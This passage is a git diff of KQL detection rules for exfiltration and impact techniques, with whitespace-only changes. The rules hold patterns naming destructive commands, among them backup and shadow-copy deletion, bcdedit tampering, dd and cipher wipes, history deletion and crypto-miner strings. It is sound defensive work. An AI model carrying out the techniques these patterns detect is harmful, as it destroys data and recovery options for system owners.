a/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql +++ b/KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Outbound SMTP Connections -// Author: frack113 -// Date: 2022-01-07 -// Level: medium -// Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. -// The data may also be sent to an alternate network location from the main command and control server. -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048.003 -// False Positives: -// - Other SMTP tools - -DeviceNetworkEvents +// Title: Suspicious Outbound SMTP Connections +// Author: frack113 +// Date: 2022-01-07 +// Level: medium +// Description: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. +// The data may also be sent to an alternate network location from the main command and control server. +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003 +// False Positives: +// - Other SMTP tools + +DeviceNetworkEvents | where (RemotePort in~ ("25", "587", "465", "2525")) and (not(((InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe") or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\" or (InitiatingProcessFolderPath endswith "\\HxTsr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_")))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql b/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql index af385f82..d59836e8 100644 --- a/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql +++ b/KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql @@ -1,10 +1,10 @@ -// Title: Suspicious PowerShell Mailbox Export to Share -// Author: Florian Roth (Nextron Systems) -// Date: 2021-08-07 -// Level: critical -// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration - -DeviceProcessEvents +// Title: Suspicious PowerShell Mailbox Export to Share +// Author: Florian Roth (Nextron Systems) +// Date: 2021-08-07 +// Level: critical +// Description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration + +DeviceProcessEvents | where ProcessCommandLine contains "New-MailboxExportRequest" and ProcessCommandLine contains " -Mailbox " and ProcessCommandLine contains " -FilePath \\\\" \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql b/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql index 0407bd60..5f4fcf52 100644 --- a/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql +++ b/KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Redirection to Local Admin Share -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-16 -// Level: high -// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048 - -DeviceProcessEvents +// Title: Suspicious Redirection to Local Admin Share +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-16 +// Level: high +// Description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048 + +DeviceProcessEvents | where ProcessCommandLine contains ">" and (ProcessCommandLine contains "\\\\127.0.0.1\\admin$\\" or ProcessCommandLine contains "\\\\localhost\\admin$\\") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql index ce3cf983..1e39d40e 100644 --- a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql +++ b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious WebDav Client Execution Via Rundll32.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2023-03-16 -// Level: high -// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397 - -DeviceProcessEvents +// Title: Suspicious WebDav Client Execution Via Rundll32.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2023-03-16 +// Level: high +// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397 + +DeviceProcessEvents | where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains "://169.254."))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/tap_installer_execution.kql b/KQL/rules/Exfiltration/tap_installer_execution.kql index f9e38623..aeabdbf9 100644 --- a/KQL/rules/Exfiltration/tap_installer_execution.kql +++ b/KQL/rules/Exfiltration/tap_installer_execution.kql @@ -1,12 +1,12 @@ -// Title: Tap Installer Execution -// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community -// Date: 2019-10-24 -// Level: medium -// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048 -// False Positives: -// - Legitimate OpenVPN TAP installation - -DeviceProcessEvents +// Title: Tap Installer Execution +// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048 +// False Positives: +// - Legitimate OpenVPN TAP installation + +DeviceProcessEvents | where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\"))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql index 2295277a..057f3ed2 100644 --- a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql +++ b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql @@ -1,11 +1,11 @@ -// Title: WebDav Client Execution Via Rundll32.EXE -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: medium -// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". -// This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). -// MITRE Tactic: Exfiltration -// Tags: attack.exfiltration, attack.t1048.003 - -DeviceProcessEvents +// Title: WebDav Client Execution Via Rundll32.EXE +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". +// This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003 + +DeviceProcessEvents | where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql index 06f13399..2390cd58 100644 --- a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql +++ b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql @@ -1,12 +1,12 @@ -// Title: All Backups Deleted Via Wbadmin.EXE -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-13 -// Level: high -// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe". -// This technique is used by numerous ransomware families and actors. -// This may only be successful on server platforms that have Windows Backup enabled. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 - -DeviceProcessEvents +// Title: All Backups Deleted Via Wbadmin.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-13 +// Level: high +// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe". +// This technique is used by numerous ransomware families and actors. +// This may only be successful on server platforms that have Windows Backup enabled. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceProcessEvents | where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/KQL/rules/Impact/backup_files_deleted.kql b/KQL/rules/Impact/backup_files_deleted.kql index 93f9a0f6..dc38bd01 100644 --- a/KQL/rules/Impact/backup_files_deleted.kql +++ b/KQL/rules/Impact/backup_files_deleted.kql @@ -1,12 +1,12 @@ -// Title: Backup Files Deleted -// Author: frack113 -// Date: 2022-01-02 -// Level: medium -// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 -// False Positives: -// - Legitimate usage - -DeviceFileEvents +// Title: Backup Files Deleted +// Author: frack113 +// Date: 2022-01-02 +// Level: medium +// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate usage + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk") \ No newline at end of file diff --git a/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql b/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql index fdfe32b3..6dd33a8b 100644 --- a/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql +++ b/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql @@ -1,12 +1,12 @@ -// Title: Boot Configuration Tampering Via Bcdedit.EXE -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019-10-24 -// Level: high -// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Boot Configuration Tampering Via Bcdedit.EXE +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set" \ No newline at end of file diff --git a/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql b/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql index 5daf3a9e..c3fb7683 100644 --- a/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql +++ b/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql @@ -1,12 +1,12 @@ -// Title: Copy From VolumeShadowCopy Via Cmd.EXE -// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) -// Date: 2021-08-09 -// Level: high -// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 -// False Positives: -// - Backup scenarios using the commandline - -DeviceProcessEvents +// Title: Copy From VolumeShadowCopy Via Cmd.EXE +// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +// Date: 2021-08-09 +// Level: high +// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Backup scenarios using the commandline + +DeviceProcessEvents | where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" \ No newline at end of file diff --git a/KQL/rules/Impact/dd_file_overwrite.kql b/KQL/rules/Impact/dd_file_overwrite.kql index 35a093b5..7b496334 100644 --- a/KQL/rules/Impact/dd_file_overwrite.kql +++ b/KQL/rules/Impact/dd_file_overwrite.kql @@ -1,12 +1,12 @@ -// Title: DD File Overwrite -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC -// Date: 2021-10-15 -// Level: low -// Description: Detects potential overwriting and deletion of a file using DD. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1485 -// False Positives: -// - Any user deleting files that way. - -DeviceProcessEvents +// Title: DD File Overwrite +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: low +// Description: Detects potential overwriting and deletion of a file using DD. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 +// False Positives: +// - Any user deleting files that way. + +DeviceProcessEvents | where (FolderPath in~ ("/bin/dd", "/usr/bin/dd")) and ProcessCommandLine contains "of=" and (ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/null") \ No newline at end of file diff --git a/KQL/rules/Impact/delete_all_scheduled_tasks.kql b/KQL/rules/Impact/delete_all_scheduled_tasks.kql index 8f4881b5..3b763009 100644 --- a/KQL/rules/Impact/delete_all_scheduled_tasks.kql +++ b/KQL/rules/Impact/delete_all_scheduled_tasks.kql @@ -1,12 +1,12 @@ -// Title: Delete All Scheduled Tasks -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-09 -// Level: high -// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1489 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Delete All Scheduled Tasks +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/delete_important_scheduled_task.kql b/KQL/rules/Impact/delete_important_scheduled_task.kql index 2cbc5c3f..81a41fb2 100644 --- a/KQL/rules/Impact/delete_important_scheduled_task.kql +++ b/KQL/rules/Impact/delete_important_scheduled_task.kql @@ -1,12 +1,12 @@ -// Title: Delete Important Scheduled Task -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-09 -// Level: high -// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1489 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Delete Important Scheduled Task +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql index 0fd00424..7b5a1979 100644 --- a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql +++ b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql @@ -1,12 +1,12 @@ -// Title: Deleted Data Overwritten Via Cipher.EXE -// Author: frack113 -// Date: 2021-12-26 -// Level: medium -// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. -// Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. -// Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1485 - -DeviceProcessEvents +// Title: Deleted Data Overwritten Via Cipher.EXE +// Author: frack113 +// Date: 2021-12-26 +// Level: medium +// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. +// Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. +// Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 + +DeviceProcessEvents | where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe") \ No newline at end of file diff --git a/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql b/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql index b32244be..aa94672f 100644 --- a/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql +++ b/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql @@ -1,10 +1,10 @@ -// Title: Deletion of Volume Shadow Copies via WMI with PowerShell -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-20 -// Level: high -// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 - -DeviceProcessEvents +// Title: Deletion of Volume Shadow Copies via WMI with PowerShell +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-20 +// Level: high +// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceProcessEvents | where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy" \ No newline at end of file diff --git a/KQL/rules/Impact/disable_important_scheduled_task.kql b/KQL/rules/Impact/disable_important_scheduled_task.kql index 891eaadc..123f1198 100644 --- a/KQL/rules/Impact/disable_important_scheduled_task.kql +++ b/KQL/rules/Impact/disable_important_scheduled_task.kql @@ -1,10 +1,10 @@ -// Title: Disable Important Scheduled Task -// Author: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior -// Date: 2021-12-26 -// Level: high -// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1489 - -DeviceProcessEvents +// Title: Disable Important Scheduled Task +// Author: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior +// Date: 2021-12-26 +// Level: high +// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 + +DeviceProcessEvents | where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql index 99f2d1d8..cd73bab1 100644 --- a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql +++ b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql @@ -1,11 +1,11 @@ -// Title: File Recovery From Backup Via Wbadmin.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2024-05-10 -// Level: medium -// Description: Detects the recovery of files from backups via "wbadmin.exe". -// Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials. -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1490 - -DeviceProcessEvents +// Title: File Recovery From Backup Via Wbadmin.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-05-10 +// Level: medium +// Description: Detects the recovery of files from backups via "wbadmin.exe". +// Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceProcessEvents | where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql b/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql index 54aab863..eac52baa 100644 --- a/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql +++ b/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql @@ -1,12 +1,12 @@ -// Title: Group Has Been Deleted Via Groupdel -// Author: Tuan Le (NCSGroup) -// Date: 2022-12-26 -// Level: medium -// Description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1531 -// False Positives: -// - Legitimate administrator activities - -DeviceProcessEvents +// Title: Group Has Been Deleted Via Groupdel +// Author: Tuan Le (NCSGroup) +// Date: 2022-12-26 +// Level: medium +// Description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1531 +// False Positives: +// - Legitimate administrator activities + +DeviceProcessEvents | where FolderPath endswith "/groupdel" \ No newline at end of file diff --git a/KQL/rules/Impact/history_file_deletion.kql b/KQL/rules/Impact/history_file_deletion.kql index 30214a1d..f9f30c29 100644 --- a/KQL/rules/Impact/history_file_deletion.kql +++ b/KQL/rules/Impact/history_file_deletion.kql @@ -1,12 +1,12 @@ -// Title: History File Deletion -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-20 -// Level: high -// Description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1565.001 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: History File Deletion +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-20 +// Level: high +// Description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1565.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory")) \ No newline at end of file diff --git a/KQL/rules/Impact/linux_crypto_mining_indicators.kql b/KQL/rules/Impact/linux_crypto_mining_indicators.kql index 810b845f..159fa543 100644 --- a/KQL/rules/Impact/linux_crypto_mining_indicators.kql +++ b/KQL/rules/Impact/linux_crypto_mining_indicators.kql @@ -1,12 +1,12 @@ -// Title: Linux Crypto Mining Indicators -// Author: Florian Roth (Nextron Systems) -// Date: 2021-10-26 -// Level: high -// Description: Detects command line parameters or strings often used by crypto miners -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1496 -// False Positives: -// - Legitimate use of crypto miners - -DeviceProcessEvents +// Title: Linux Crypto Mining Indicators +// Author: Florian Roth (Nextron Systems) +// Date: 2021-10-26 +// Level: high +// Description: Detects command line parameters or strings often used by crypto miners +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1496 +// False Positives: +// - Legitimate use of crypto miners + +DeviceProcessEvents | where ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "sh -c /sbin/modprobe msr allow_writes=on" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL" \ No newline at end of file diff --git a/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql b/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql index 78adb04d..d12702fd 100644 --- a/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql +++ b/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql @@ -1,12 +1,12 @@ -// Title: Linux Crypto Mining Pool Connections -// Author: Florian Roth (Nextron Systems) -// Date: 2021-10-26 -// Level: high -// Description: Detects process connections to a Monero crypto mining pool -// MITRE Tactic: Impact -// Tags: attack.impact, attack.t1496 -// False Positives: -// - Legitimate use of crypto miners - -DeviceNetworkEvents +// 